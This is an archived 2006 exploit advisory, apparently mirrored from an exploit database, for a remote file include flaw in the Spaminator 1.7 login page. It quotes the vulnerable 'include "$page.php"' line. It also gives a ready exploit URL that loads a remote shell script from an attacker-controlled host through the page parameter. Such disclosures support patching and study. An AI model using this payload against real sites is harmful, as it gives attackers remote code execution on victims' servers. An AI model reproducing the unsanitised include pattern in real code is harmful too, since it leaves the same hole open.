Spaminator <= 1.7 (page) Remote File Include Vulnerability

[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]

# Title : Spaminator <= 1.7 (page) Remote File Include Vulnerability
# Published : 2006-08-10
# Author : Drago84
# Previous Title : SAPID CMS <= 1.2.3_rc3 (rootpath) Remote Code Execution Exploit
# Next Title : phpwcms <= 1.1-RC4 (spaw) Remote File Include Vulnerability

Spaminator 1.7. ($page) Remote File Include
CreW: ToXiC
BuG Found By Drago84

SourcE CodE:
http://freshmeat.net/redir/spaminator/16281/url_tgz/spaminator-1.7.tar.gz

Page Affect is:
/src/Login.php

Problem is
   include "$page.php";

Path :
Declare $page

ExpL:
http://www.site.com/dir_spaminator/src/Login.php?page=http://www.evalsite.com/shell.php?

Greatz:str0ke

# www.Syue.com [2006-08-10]